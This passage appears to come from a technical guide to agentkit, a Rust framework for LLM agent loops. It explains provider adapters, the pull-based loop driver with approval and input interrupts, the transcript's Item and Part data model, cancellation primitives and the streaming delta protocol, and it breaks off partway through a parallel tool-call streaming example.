`agentkit-provider-openai`	OpenAI	Bearer	`api.openai.com/v1/chat/completions`
`agentkit-provider-ollama`	Ollama	none	`localhost:11434/v1/chat/completions`
`agentkit-provider-vllm`	vLLM	optional Bearer	`localhost:8000/v1/chat/completions`
`agentkit-provider-groq`	Groq	Bearer	`api.groq.com/openai/v1/chat/completions`
`agentkit-provider-mistral`	Mistral	Bearer	`api.mistral.ai/v1/chat/completions`

Each follows the same pattern: a config struct with new() fluent builders (and an optional from_env() helper), a Serialize request config, and a CompletionsProvider impl. Provider-specific parameters are strongly typed — Ollama has num_predict and top_k, Mistral uses max_tokens instead of max_completion_tokens, OpenAI has frequency_penalty and presence_penalty.

For providers not listed here, you can either:

Implement CompletionsProvider if the provider speaks the OpenAI chat completions format (~50 lines)
Implement ModelAdapter / ModelSession / ModelTurn directly if the provider has a non-standard API (as shown in the AcmeAI example)

Chapter 2: What is an agent loop? →

What is an agent loop?

A chat completion takes a transcript and returns a response. An agent loop extends this by inspecting the response for tool calls, executing them, appending the results to the transcript, and sending the updated transcript back to the model. This repeats until the model produces a response with no tool calls, or until the host intervenes.

This chapter defines the structure of that loop and maps it to agentkit’s core types.

The basic loop

An agent loop repeats five steps:

Send the current transcript to the model
Receive the model’s response (which may contain text, tool calls, or both)
If the response contains tool calls, execute them
Append the tool results to the transcript
Go to 1

┌───────────────────────────────────────────┐
│              Host application             │
│                                           │
│   submit user input                       │
│        │                                  │
│        ▼                                  │
│   ┌──────────┐   ┌────────────────────┐   │
│   │Transcript│──▶│  Model inference   │   │
│   │          │◀──│  (streaming turn)  │   │
│   └──────────┘   └────────┬───────────┘   │
│        │                  │               │
│        │          ┌───────▼───────┐       │
│        │          │ Tool calls?   │       │
│        │          └───┬───────┬───┘       │
│        │           no │       │ yes       │
│        │              ▼       ▼           │
│        │          [return] [execute]      │
│        │                      │           │
│        └──────────────────────┘           │
│              append results               │
└───────────────────────────────────────────┘

The number of iterations is determined by the model at runtime. The loop may execute zero tool calls (a plain text response) or dozens across multiple turns. This is what distinguishes an agent from a pipeline — the control flow is dynamic.

Loop vs pipeline

In a pipeline, data flows through a fixed sequence of stages. The topology is known at compile time. An agent loop has a dynamic topology: the model decides which tools to call, in what order, and how many times.

This has architectural consequences. A pipeline framework optimises for stage composition and throughput. An agent framework must handle:

variable iteration count — the loop runs until the model stops requesting tools
interrupt points — the host may need to intervene mid-loop (user cancellation, approval gates, auth challenges)
transcript growth — each iteration adds items, eventually requiring compaction
parallel execution — independent tool calls within a single turn can run concurrently

The control boundary

The central design question is: where does the framework yield control to the host?

agentkit uses a pull-based model. The host calls driver.next().await and receives one of two outcomes:

#![allow(unused)]
fn main() {
pub enum LoopStep {
    Interrupt(LoopInterrupt),
    Finished(TurnResult),
}
}

Finished means the model completed a turn — the host can inspect the results, submit new input, and call next() again. Interrupt means the loop cannot proceed without host action.

Host                                    LoopDriver
 │                                         │
 │  Agent::builder()                       │
 │    .transcript(prior)                   │  passive, optional
 │    .input([first_user_msg])             │  optional one-shot opener
 │    .build()?                            │
 │                                         │
 │  agent.start(cfg)                       │
 │────────────────────────────────────────▶│
 │                                         │
 │  next().await                           │
 │────────────────────────────────────────▶│
 │                                         │
 │  if no input was preloaded:             │
 │  LoopStep::Interrupt(AwaitingInput)     │
 │◀────────────────────────────────────────│  no input queued yet
 │  req.submit(driver, [first_user_msg])   │
 │────────────────────────────────────────▶│
 │  next().await                           │
 │────────────────────────────────────────▶│
 │                                         ├── send transcript to model
 │                                         ├── stream response
 │                                         ├── execute tool calls
 │                                         ├── (possibly loop internally)
 │                                         │
 │  LoopStep::Finished(result)             │
 │◀────────────────────────────────────────│
 │                                         │
 │  next().await                           │
 │────────────────────────────────────────▶│
 │                                         │
 │  LoopStep::Interrupt(...)               │
 │◀────────────────────────────────────────│  needs host decision
 │                                         │
 │  pending.approve(driver)                │
 │────────────────────────────────────────▶│  host resolves, loop resumes
 │                                         │

There is no polling, no callback registration, and no event queue the host must drain. The next() call is the only synchronisation point.

Interrupts

An interrupt pauses the loop and returns control to the host. agentkit defines three interrupt types, split into blocking (must be resolved before the loop continues) and cooperative (host may ignore the yield and call next() again):

#![allow(unused)]
fn main() {
pub enum LoopInterrupt {
    ApprovalRequest(PendingApproval),     // blocking
    AwaitingInput(InputRequest),          // cooperative
    AfterToolResult(ToolRoundInfo),       // cooperative
}
}

Interrupt	Trigger	Resolution
`ApprovalRequest`	A tool call requires explicit permission	Host calls `approve()` or `deny()` on the `PendingApproval` handle
`AwaitingInput`	The model finished and the loop has no pending input	Host calls `req.submit(&mut driver, items)` on the `InputRequest` handle
`AfterToolResult`	A tool round completed, model is about to be called again	Optional — host calls `info.submit(&mut driver, items)` to interject, or `next()`

MCP auth. Earlier versions of agentkit surfaced AuthRequest as a fourth loop interrupt. Auth is now an MCP-only concept: the manager raises McpError::AuthRequired(AuthRequest) from non-tool operations and ToolError::AuthRequired(_) from tool calls, and the host resolves them out-of-band via McpServerManager::resolve_auth. The loop never blocks on auth.

This pattern generalises. Userland and third-party tools can define their own strongly-typed pause-and-resume protocols (think payment confirmations, hardware key taps, multi-step wizards) by surfacing a tool-specific error variant and exposing a resolver on the tool handle. The host catches the typed error, drives the resolution through the tool’s own API, and retries. The loop interrupt enum stays closed: there is no need to plumb every new interaction shape through LoopInterrupt, and no need for a catch-all Custom(Box<dyn Any>) variant that would erase the type at the boundary.

Interrupts are the mechanism for user cancellation and external preemption. A user who wants to abort a loop heading in the wrong direction triggers a cancellation (via CancellationController::interrupt()), which causes the current turn to end with FinishReason::Cancelled. The host sees this in the TurnResult and can decide how to proceed — submit corrected input, adjust the system prompt, or stop entirely.

Non-blocking events

Not everything requires host intervention. Streaming deltas, usage updates, tool lifecycle events, and mutator notifications are delivered to LoopObserver implementations:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send + Sync {
    fn handle_event(&self, event: AgentEvent);
}
}

Observers take &self and hold mutable state behind interior mutability so the driver can share each one as Arc<dyn LoopObserver> across multiple sessions.

Observers are informational — they cannot stall the loop or alter its control flow. This keeps the driver’s state machine simple: next() either returns a LoopStep or doesn’t return yet. There is no interleaving of observer handling with loop logic.

Control flow (`LoopStep`)	Observation (`AgentEvent`)
`ApprovalRequest`	`ContentDelta`
`AwaitingInput`	`ToolCallRequested` / `ToolResultReceived`
`AfterToolResult`	`ToolCatalogChanged`
`Finished(TurnResult)`	`UsageUpdated`
	`MutationStarted` / `MutationFinished`
	`TurnStarted` / `TurnFinished` / `Warning`

For loss-free transcript reconstruction (persistence, replication, audit), register a TranscriptObserver alongside the operational LoopObserver. The two observe different things:

LoopObserver sees a stream of AgentEvents. Content arrives as deltas — partial fragments that don’t carry their parent-Item identity — interleaved with lifecycle and telemetry events. Useful for UIs and logging, but a consumer cannot reassemble the canonical transcript from this stream alone.
TranscriptObserver fires exactly once per Item appended, with the fully-formed Item ready to persist. Calls happen synchronously from the driver, in transcript order, at the single mutation point that owns the transcript — so what the observer sees is what the loop will send to the model on the next turn.

Mutator-driven rewrites (compaction, redaction, repair) do not fire on_item_appended; they are signalled separately by AgentEvent::MutationFinished, which a persistence layer can use to snapshot the post-mutation state.

The three-layer model

agentkit splits the runtime into three layers:

┌─────────────────────────────────────────────┐
│  Agent                                      │
│  (config: adapter, tools, permissions,      │
│   observers, compaction)                    │
│                                             │
│   ┌─────────────────────────────────────┐   │
│   │  LoopDriver                         │   │
│   │  (mutable state: transcript,        │   │
│   │   pending input, interrupt state)   │   │
│   │                                     │   │
│   │   ┌─────────────────────────────┐   │   │
│   │   │  ModelSession               │   │   │
│   │   │  (provider connection,      │   │   │
│   │   │   turn management)          │   │   │
│   │   └─────────────────────────────┘   │   │
│   └─────────────────────────────────────┘   │
└─────────────────────────────────────────────┘

Agent — immutable configuration assembled via a builder. Holds the model adapter, tool registry, permission checker, observers, and compaction config. Can start multiple sessions.
LoopDriver<S> — the mutable runtime for a single session. Owns the transcript, manages pending input, tracks interrupt state, and drives the turn loop. Generic over the session type S.
ModelSession — the provider-owned session handle. Created by the adapter, consumed by the driver. Each turn calls begin_turn() which returns a streaming ModelTurn.

This separation means: configure once, run many sessions. Or run multiple concurrent sessions from the same Agent, each with its own LoopDriver and independent transcript.

A minimal example

The openrouter-chat example demonstrates the simplest possible host loop. The key parts:

Setup — build an Agent with just a model adapter and a preloaded first user message, then start the session:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .cancellation(cancellation.handle())
    // Optional — preload a prior transcript (system prompt or resumed
    // session) and the next user turn so the first next() drives a turn
    // directly. Both default to empty.
    .input(vec![Item::text(ItemKind::User, prompt)])
    .build()?;

let mut driver = agent
    .start(SessionConfig::new("openrouter-chat").with_cache(
        PromptCacheRequest::automatic().with_retention(PromptCacheRetention::Short),
    ))
    .await?;
}

AgentBuilder::transcript takes the prior transcript — typically [system_item] for a fresh session, or a transcript loaded from a database / file when resuming. It is loaded passively. AgentBuilder::input preloads the next user turn into the driver’s pending-input queue: when non-empty, the first next() dispatches the model directly; when left empty (the default for turn-based loops), the first next() yields AwaitingInput and the host supplies input via InputRequest::submit.

The session-level cache configures prompt caching for the session. It is optional, but most long-running agents benefit from setting it. See Chapter 15 for the full cache request shape.

Drive the loop — call next().await and match on the result:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Finished(result) => {
        // Render assistant items from result.items
    }
    LoopStep::Interrupt(LoopInterrupt::AwaitingInput(req)) => {
        // Model finished — call req.submit(&mut driver, more_items)? to
        // continue the conversation, or drop the handle to stop.
    }
    LoopStep::Interrupt(LoopInterrupt::AfterToolResult(info)) => {
        // Tool round done. Non-interactive callers just loop back; an
        // interactive host may call info.submit(&mut driver, items)?
        // to interject a user message before the next model call.
    }
    LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
        // A tool needs permission — pending.approve(&mut driver)? /
        // pending.deny(&mut driver)?
    }
}
}

This is the entire host-side contract. The loop handles streaming, tool execution, transcript accumulation, and compaction internally. The host only sees LoopStep values — either results to render or interrupts to resolve.

No tools are registered in this example, so the model cannot make tool calls and the loop always returns Finished after a single inference turn. Adding tools is covered in Chapter 9.

What comes next

The following chapters build up each piece of this system:

Chapter 3 defines the data model — the Item and Part types that make up the transcript
Chapter 4 covers how streaming works and how deltas fold into durable parts
Chapter 5 defines the boundary between the loop and model providers
Chapter 6 walks through the driver implementation
Chapter 7 covers the interrupt system in detail

The transcript model

The transcript is the agent’s memory of a conversation. Every message, tool call, tool result, and piece of context is represented as an Item in a Vec<Item>. The model sees the transcript on every turn. The loop appends to it. Compaction trims it.

This chapter covers agentkit-core: the foundational data types that every other crate depends on.

The transcript as a data structure

A transcript is a flat vector of items. Each item has a role and carries content:

Vec<Item>
├── Item { kind: System,     parts: [Text("You are a coding assistant.")] }
├── Item { kind: Context,    parts: [Text("Project uses Rust 2024 edition...")] }
├── Item { kind: User,       parts: [Text("Read src/main.rs")] }
├── Item { kind: Assistant,  parts: [Text("I'll read that file."),
│                                    ToolCall { name: "fs_read_file", ... }] }
├── Item { kind: Tool,       parts: [ToolResult { output: "fn main() {...}", ... }] }
└── Item { kind: Assistant,  parts: [Text("The file contains...")] }

This is the complete state that the model receives on every turn. The loop does not maintain hidden side channels or out-of-band context — if something affects the model’s behaviour, it’s in the transcript.

Items and roles

An Item is the basic unit of the transcript:

#![allow(unused)]
fn main() {
pub struct Item {
    pub id: Option<MessageId>,
    pub kind: ItemKind,
    pub parts: Vec<Part>,
    pub metadata: MetadataMap,
}
}

The kind field determines the item’s role:

#![allow(unused)]
fn main() {
pub enum ItemKind {
    System,      // Application-level instructions
    Developer,   // Developer-level instructions
    User,        // End-user messages
    Assistant,   // Model-generated responses
    Tool,        // Tool execution results
    Context,     // Loaded project context (AGENTS.md, skills, etc.)
}
}

The variants are ordered: System < Developer < User < Assistant < Tool < Context. This ordering is used by compaction strategies that need to sort or prioritise items by role.

Role mapping to provider wire formats:

agentkit `ItemKind`	OpenAI role	What it carries
`System`	`"system"`	Hardcoded application instructions
`Developer`	`"system"`	Developer-level instructions
`User`	`"user"`	End-user messages
`Assistant`	`"assistant"`	Model-generated text + tool calls
`Tool`	`"tool"`	Tool execution results
`Context`	`"system"`	Project context (AGENTS.md, etc.)

System, Developer, and Context all map to "system" in the OpenAI wire format, but they carry different semantic intent. The distinction matters for compaction: system items are never trimmed, context items may be refreshed, and developer items sit between the two. Collapsing them into a single kind would lose information that compaction strategies need.

Why item-based, not message-based

Older chat APIs model conversations as a flat list of messages with a role field. agentkit uses “items” with “parts” instead, because modern models work with content blocks — a single assistant response may contain text, a tool call, reasoning output, and structured data. Flattening these into separate messages loses structure that the model, compaction strategies, and reporters all need.

Flat message model (what you'd get with role + string):

  { role: "assistant", content: "I'll read main.rs" }
  { role: "assistant", content: null, tool_calls: [...] }

  Two "messages" for one logical response.
  Which one do you compact? How do you correlate them?


Item + parts model (agentkit):

  Item {
      kind: Assistant,
      parts: [
          Text("I'll read main.rs"),
          ToolCall { name: "fs_read_file", input: { "path": "src/main.rs" } },
      ]
  }

  One item. All parts belong to the same response.
  Compaction, reporting, and persistence all see one unit.

Content parts

Each item contains one or more Part values:

#![allow(unused)]
fn main() {
pub enum Part {
    Text(TextPart),
    Media(MediaPart),
    File(FilePart),
    Structured(StructuredPart),
    Reasoning(ReasoningPart),
    ToolCall(ToolCallPart),
    ToolResult(ToolResultPart),
    Custom(CustomPart),
}
}

The part types cover the full range of content that flows through an agent:

Part variant	Primary use	Example
`Text`	User messages, assistant replies	`"Hello, world!"`
`Media`	Images, audio, video	A PNG screenshot
`File`	File attachments	`report.csv`
`Structured`	JSON output, function returns	`{ "status": "ok" }`
`Reasoning`	Chain-of-thought, thinking blocks	Model’s internal reasoning
`ToolCall`	Model requests a tool invocation	`fs_read_file("src/main.rs")`
`ToolResult`	Tool execution output	`"fn main() { ... }"`
`Custom`	Provider-specific extensions	Raw provider-specific content

Design decision: comprehensive multimodal from day one

agentkit ships with first-class support for text, audio, image, video, files, structured output, and reasoning blocks. The Custom variant exists as an escape hatch for provider-specific content, but the goal is that Custom should be rare — common modalities should map to named variants.

This matters because a text-only provider, a voice-only provider, and a multimodal provider all map naturally into the same Item { parts: Vec<Part> } structure. Complexity grows linearly with modalities, not combinatorially with provider combinations.

Part type details

TextPart is the simplest and most common:

#![allow(unused)]
fn main() {
pub struct TextPart {
    pub text: String,
    pub metadata: MetadataMap,
}
}

MediaPart handles binary content through a modality discriminant and a data reference:

#![allow(unused)]
fn main() {
pub struct MediaPart {
    pub modality: Modality,    // Audio, Image, Video, Binary
    pub mime_type: String,     // e.g. "image/png", "audio/wav"
    pub data: DataRef,
    pub metadata: MetadataMap,
}
}

ReasoningPart captures model chain-of-thought output, which some providers expose alongside the final answer:

#![allow(unused)]
fn main() {
pub struct ReasoningPart {
    pub summary: Option<String>,   // Human-readable reasoning
    pub data: Option<DataRef>,     // Opaque reasoning data
    pub redacted: bool,            // Provider filtered the content
    pub metadata: MetadataMap,
}
}

The redacted flag is important: some providers expose reasoning in debug mode but redact it in production. The transcript records that reasoning happened even when the content is withheld.

StructuredPart carries validated JSON output:

#![allow(unused)]
fn main() {
pub struct StructuredPart {
    pub value: Value,
    pub schema: Option<Value>,     // JSON Schema the value conforms to
    pub metadata: MetadataMap,
}
}

The `DataRef` abstraction

Media, files, and other binary content don’t carry their bytes inline by default. Instead, they reference data through DataRef:

#![allow(unused)]
fn main() {
pub enum DataRef {
    InlineText(String),    // UTF-8 text (e.g. base64-encoded image)
    InlineBytes(Vec<u8>),  // Raw bytes
    Uri(String),           // External URL
    Handle(ArtifactId),    // Reference to an artifact store
}
}

This is a storage-agnostic pointer. The same MediaPart can reference an image as a base64 string (for small images going directly to the model), a URL (for provider-hosted content), or an artifact handle (for content managed by the host application).

DataRef variants and when to use them:

InlineText ─── small payloads already base64-encoded
                (provider APIs often accept images this way)

InlineBytes ── small payloads in raw binary form
                (useful for local processing before encoding)

Uri ────────── content hosted externally
                (the provider fetches it, or the adapter does)

Handle ─────── content in a host-managed artifact store
                (transcript stays lightweight, data lives elsewhere)

This lets the transcript stay lightweight while supporting large payloads through external storage. A conversation with many image screenshots doesn’t bloat the transcript if the images are stored as Handle references.

Tool call and result types

Tool interaction is modeled as content parts, not side channels:

#![allow(unused)]
fn main() {
pub struct ToolCallPart {
    pub id: ToolCallId,
    pub name: String,
    pub input: serde_json::Value,
    pub metadata: MetadataMap,
}

pub struct ToolResultPart {
    pub call_id: ToolCallId,
    pub output: ToolOutput,
    pub is_error: bool,
    pub metadata: MetadataMap,
}
}

The call_id on ToolResultPart references the id on ToolCallPart. This correlation is how the model matches results back to the requests it made.

Correlation between tool calls and results:

  Item { kind: Assistant, parts: [
      ToolCall { id: "call-1", name: "fs_read_file", input: {...} },
      ToolCall { id: "call-2", name: "shell_exec",   input: {...} },
  ]}
       │                                │
       │ call_id: "call-1"              │ call_id: "call-2"
       ▼                                ▼
  Item { kind: Tool, parts: [
      ToolResult { call_id: "call-1", output: "fn main()...", is_error: false },
      ToolResult { call_id: "call-2", output: "error: ...",   is_error: true  },
  ]}

When the model requests multiple tool calls in a single response, the assistant item contains multiple ToolCallParts, and the corresponding tool item contains multiple ToolResultParts. The id/call_id pairs maintain the mapping.

ToolOutput preserves rich structure:

#![allow(unused)]
fn main() {
pub enum ToolOutput {
    Text(String),
    Structured(Value),
    Parts(Vec<Part>),
    Files(Vec<FilePart>),
}
}

Tools don’t have to collapse their output to a plain string. A tool that reads a file returns Text. A tool that queries a database returns Structured. A tool that captures a screenshot returns Parts containing a MediaPart. The loop and provider adapter decide how to serialize the output when building the next model request.

Typed identifiers

agentkit uses newtype wrappers for all identifiers:

#![allow(unused)]
fn main() {
pub struct SessionId(pub String);
pub struct TurnId(pub String);
pub struct MessageId(pub String);
pub struct ToolCallId(pub String);
pub struct TaskId(pub String);
pub struct ApprovalId(pub String);
pub struct ProviderMessageId(pub String);
pub struct ArtifactId(pub String);
pub struct PartId(pub String);
}

All generated by the same id_newtype! macro, which derives Clone, Debug, Serialize, Deserialize, Display, Hash, Eq, Ord, and conversions from &str and String.

This prevents accidental mix-ups — passing a ToolCallId where a TaskId is expected is a compile error, not a runtime bug. The cost is some verbosity when constructing IDs (SessionId::new("my-session") instead of "my-session"), but the safety benefit compounds across a codebase where dozens of string IDs flow through multiple layers.

Without newtypes:

  fn execute(call_id: String, task_id: String, session_id: String) { ... }
  execute(session_id, call_id, task_id);  // compiles, wrong at runtime

With newtypes:

  fn execute(call_id: ToolCallId, task_id: TaskId, session_id: SessionId) { ... }
  execute(session_id, call_id, task_id);  // compile error

The metadata bag

Every significant type carries a MetadataMap:

#![allow(unused)]
fn main() {
pub type MetadataMap = BTreeMap<String, serde_json::Value>;
}

This is the extension point. Provider-specific data (like an OpenAI logprobs field or an OpenRouter cost value) lives in namespaced metadata keys rather than polluting the core schema. The convention is provider_name.field_name:

Metadata key	Source	Example value
`openrouter.model`	OpenRouter adapter	`"anthropic/claude-3.5-sonnet"`
`openrouter.refusal`	OpenRouter adapter	`"I cannot help with that"`
`agentkit.interrupted`	Loop driver	`true`
`agentkit.interrupt_reason`	Loop driver	`"user_cancelled"`

BTreeMap is used instead of HashMap for deterministic serialization order — metadata roundtrips through JSON identically regardless of insertion order. This matters for snapshot testing and transcript persistence.

The rest of the stack never depends on metadata for correctness. It’s there for observability, debugging, and host-specific extensions.

Usage and finish reasons

Token counts and costs are first-class:

#![allow(unused)]
fn main() {
pub struct Usage {
    pub tokens: Option<TokenUsage>,
    pub cost: Option<CostUsage>,
    pub metadata: MetadataMap,
}

pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
    pub reasoning_tokens: Option<u64>,
    pub cached_input_tokens: Option<u64>,
    pub cache_write_input_tokens: Option<u64>,
}

pub struct CostUsage {
    pub amount: f64,
    pub currency: String, // ISO 4217, e.g. "USD"
    pub provider_amount: Option<String>,
}
}

Not all providers report all fields. TokenUsage uses Option for fields that only some providers support (reasoning tokens, cached input tokens, cache write tokens). The Usage struct itself wraps both token and cost in Option because some providers report one without the other.

Finish reasons are normalized to a small, stable enum:

#![allow(unused)]
fn main() {
pub enum FinishReason {
    Completed,   // Normal completion
    ToolCall,    // Stopped to invoke tools
    MaxTokens,   // Hit the token limit
    Cancelled,   // User-initiated cancellation
    Blocked,     // Content policy violation
    Error,       // Generation error
    Other(String),
}
}

The loop inspects FinishReason to decide what to do next:

`FinishReason`	Loop behaviour
`Completed`	Return `TurnResult` to the host
`ToolCall`	Execute tools, start another model turn
`MaxTokens`	Return `TurnResult` (host may submit more input)
`Cancelled`	Return `TurnResult` with cancellation metadata
`Blocked`	Return `TurnResult` (host may adjust the prompt)
`Error`	Return error to the host
`Other(s)`	Treat as `Completed` (log the unknown reason)

Providers map their native stop reasons into this enum. The original value can be preserved in metadata if needed.

Cancellation primitives

agentkit supports cooperative turn cancellation through a generation-counter pattern:

#![allow(unused)]
fn main() {
pub struct CancellationController { /* Arc<AtomicU64> */ }
pub struct CancellationHandle { /* Arc<AtomicU64> */ }
pub struct TurnCancellation { handle: CancellationHandle, generation: u64 }
}

The three types form a publish-subscribe pattern:

CancellationController              CancellationHandle
(owned by the host)                 (shared with loop + tools)
        │                                   │
        │  interrupt()                      │  checkpoint()
        │  ─────────▶ bumps AtomicU64       │  ────────────▶ TurnCancellation
        │             (generation: 0→1)     │                 { generation: 0 }
        │                                   │
        │                                   │  After interrupt():
        │                                   │  checkpoint.is_cancelled() → true
        │                                   │  (because 0 ≠ 1)

The controller increments a counter. Any TurnCancellation checkpoint created before the increment reports itself as cancelled. This is lightweight (one AtomicU64), lock-free, and works in tokio::select! to race a model call against user interruption:

#![allow(unused)]
fn main() {
tokio::select! {
    result = model_turn.next_event(None) => { /* process event */ }
    _ = cancellation.cancelled() => { /* turn was cancelled */ }
}
}

The cancelled() method polls every 10ms — fast enough for responsive cancellation, cheap enough to run alongside every model call.

Per-item bookkeeping fields

Item carries a few optional fields that the loop populates as the transcript is built. They are not part of the wire format — they’re host-side bookkeeping that downstream consumers (compaction triggers, reporters, persistence) can read without rebuilding their own indexes:

#![allow(unused)]
fn main() {
pub struct Item {
    pub id: Option<MessageId>,
    pub kind: ItemKind,
    pub parts: Vec<Part>,
    pub metadata: MetadataMap,
    pub usage: Option<Usage>,           // populated by the loop on assistant items
    pub finish_reason: Option<FinishReason>, // populated by the loop on assistant items
    pub created_at: Option<Timestamp>,  // stamped by the loop on every appended item
}
}

Timestamp(u64) is wall-clock milliseconds since the Unix epoch. The loop stamps created_at exactly once per item, when it lands in the transcript. Consumers can sort, filter, or expire by age without depending on a particular date-time crate.

This is what lets context_window_trigger find “the last reported input_tokens” by walking the transcript directly, instead of needing a separate Usage channel to listen on.

Design principles

Three principles guide the core data model:

Normalize what the rest of the stack must reason about. If the loop, tools, compaction, and reporting all need to understand something, it gets a first-class type in core. This is why FinishReason has explicit variants for ToolCall and Cancelled rather than encoding them as metadata — the loop’s branching logic depends on them.
Don’t force provider wire formats into the public API. Providers keep their native types internally. They project into core types at the boundary. A provider that uses "stop" for Completed and "end_turn" for ToolCall handles the mapping in its adapter — the loop never sees provider-native strings.
Preserve provider-specific data without polluting the model. A small number of first-class fields (parts, usage, finish reason) plus an open-ended MetadataMap on every type. The first-class fields cover what the framework must understand; metadata covers what specific integrations care about.

Error types

agentkit-core defines three error types used across the workspace:

NormalizeError — content cannot be projected into the agentkit data model (e.g. an unsupported media type)
ProtocolError — the provider or loop reached an invalid state (e.g. a tool result without a matching call)
AgentError — unifies both via From impls, used as the top-level error type

These are intentionally minimal. Each downstream crate defines its own error types (like LoopError, ToolError, CompactionError) that wrap or convert from these when needed.

Crate: agentkit-core — this entire chapter describes types defined in this single crate. It has no runtime dependencies and no async code. Every other crate in the workspace depends on it.

Streaming and deltas

Models generate tokens incrementally. A production agent must handle this streaming output — rendering text to the user as it arrives, accumulating tool call arguments chunk by chunk, and folding everything into durable transcript items when the turn completes.

This chapter covers the Delta type and the streaming protocol.

The problem with streaming

Streaming creates a fundamental tension: the transcript stores complete Part values, but the model emits fragments. You need a way to bridge these two representations without requiring every downstream consumer (reporters, compaction, persistence) to understand the streaming protocol.

What the provider sends (SSE stream):

  data: {"delta":{"content":"The"}}
  data: {"delta":{"content":" answer"}}
  data: {"delta":{"content":" is"}}
  data: {"delta":{"content":" 42."}}
  data: [DONE]

What the transcript stores (after the turn):

  Item {
      kind: Assistant,
      parts: [Part::Text(TextPart { text: "The answer is 42." })]
  }

Everything between those two representations is the streaming layer’s job.

agentkit’s solution is to separate the two concerns entirely:

Delta — transient, incremental, consumed during a turn
Part — durable, complete, stored in the transcript after a turn

The loop folds deltas into parts. Reporters observe deltas for real-time rendering. The transcript only ever contains committed parts.

Provider SSE stream
        │
        ▼
   ┌──────────┐
   │  Adapter  │  converts SSE chunks → Delta values
   └────┬─────┘
        │
        ▼
   Delta stream (transient, intra-turn)
   ┌──────────────────────────────────────────────┐
   │ BeginPart → AppendText → AppendText → Commit │
   └─────┬──────────────┬────────────────────┬────┘
         │              │                    │
         ▼              ▼                    ▼
    LoopObserver    LoopObserver        LoopDriver
    (reporter)     (usage tracker)     (folds → Part)
                                             │
                                             ▼
                                     Transcript (durable)
                                     Vec<Item> with committed Parts

The delta protocol

#![allow(unused)]
fn main() {
pub enum Delta {
    BeginPart { part_id: PartId, kind: PartKind },
    AppendText { part_id: PartId, chunk: String },
    AppendBytes { part_id: PartId, chunk: Vec<u8> },
    ReplaceStructured { part_id: PartId, value: Value },
    SetMetadata { part_id: PartId, metadata: MetadataMap },
    CommitPart { part: Part },
}
}

Each variant serves a specific role in the streaming lifecycle:

Delta variant	When it’s emitted	What the consumer does
`BeginPart`	Model starts generating a new content block	Allocate a buffer for `part_id`
`AppendText`	A text chunk arrives (token or group of tokens)	Append to the text buffer
`AppendBytes`	A binary chunk arrives (audio, image data)	Append to the byte buffer
`ReplaceStructured`	A structured value is updated wholesale	Replace the buffer contents
`SetMetadata`	Metadata for a part is available	Store metadata for the part
`CommitPart`	The part is complete	Finalise, discard the buffer

A text streaming sequence

The most common case — the model generates a text response:

Adapter emits:                                       Reporter sees:     Buffer state:

1. BeginPart { id: "p1", kind: Text }                (allocate)         ""
2. AppendText { id: "p1", chunk: "The " }            print("The ")      "The "
3. AppendText { id: "p1", chunk: "answer" }          print("answer")    "The answer"
4. AppendText { id: "p1", chunk: " is " }            print(" is ")      "The answer is "
5. AppendText { id: "p1", chunk: "42." }             print("42.")       "The answer is 42."
6. CommitPart { part: Text("The answer is 42.") }    (done)             → transcript

The reporter prints each chunk as it arrives — the user sees text appear incrementally. The driver accumulates the same chunks but only commits the final Part to the transcript.

A multi-part streaming sequence

An assistant response with both text and a tool call:

1. BeginPart { id: "p1", kind: Text }
2. AppendText { id: "p1", chunk: "I'll read that file." }
3. CommitPart { part: Text("I'll read that file.") }
4. BeginPart { id: "p2", kind: ToolCall }
5. AppendText { id: "p2", chunk: "{\"path\":" }          ← JSON argument streaming
6. AppendText { id: "p2", chunk: " \"src/main.rs\"}" }
7. CommitPart { part: ToolCall { name: "fs_read_file", input: {...} } }

Note that part_id distinguishes concurrent parts. The protocol supports interleaved deltas for different parts, though most providers emit parts sequentially.

Why not mirror Part variants in Delta?

A simpler design would be one delta variant per part type (TextDelta, MediaDelta, etc.). agentkit uses generic operations instead (AppendText, AppendBytes, ReplaceStructured) because:

Multiple part types use text appending (text, reasoning, tool call arguments)
Multiple part types use byte appending (audio, image, video)
The operations describe what’s happening during streaming, not what the final type will be
Adding a new part type doesn’t require a new delta variant unless it has genuinely novel streaming behavior

Delta operations vs Part types — the many-to-many relationship:

AppendText ────── Text          (user/assistant text)
           ├──── Reasoning      (chain-of-thought output)
           └──── ToolCall       (JSON arguments as text)

AppendBytes ───── Media(Audio)  (audio stream)
            ├──── Media(Image)  (image data)
            └──── Media(Video)  (video frames)

ReplaceStructured ─── Structured (JSON output, replaced wholesale)

Some OpenAI-compatible gateways return generated images as complete delta.images[] entries rather than partial byte streams. Adapters can surface those as immediate BeginPart / CommitPart media deltas while still storing the final Part::Media in the transcript.

Tool call streaming

Tool calls stream differently from text. The model emits the tool name upfront (usually in a non-streaming fashion) and then streams the JSON arguments incrementally:

SSE from provider:

  data: {"delta":{"tool_calls":[{"index":0,"id":"call-7","function":{"name":"fs_read_file"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"{\"pa"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"th\":"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":" \"sr"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"c/mai"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"n.rs\""}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"}"}}]}}

What the adapter emits:

  BeginPart { id: "tc0", kind: ToolCall }
  AppendText { id: "tc0", chunk: "{\"pa" }
  AppendText { id: "tc0", chunk: "th\": " }
  AppendText { id: "tc0", chunk: "\"src/mai" }
  AppendText { id: "tc0", chunk: "n.rs\"}" }
  CommitPart { part: ToolCall { id: "call-7", name: "fs_read_file", input: {"path":"src/main.rs"} } }

The loop waits for CommitPart before executing the tool. Partial JSON arguments are not actionable — {"pa is not a valid tool input. This is why tool calls use the same AppendText mechanism as regular text but the driver only acts on the committed ToolCallPart.

Parallel tool call streaming

When the model requests multiple tool calls in a single response, the SSE stream interleaves them by index:

data: {"delta":{"tool_calls":[{"index":0,"id":"call-1","function":{"name":"fs_read_file"}}]}}
data: {"delta":{"tool_calls":[{"index":1,"id":"call-2","function":{"name":"shell_exec"}}]}}
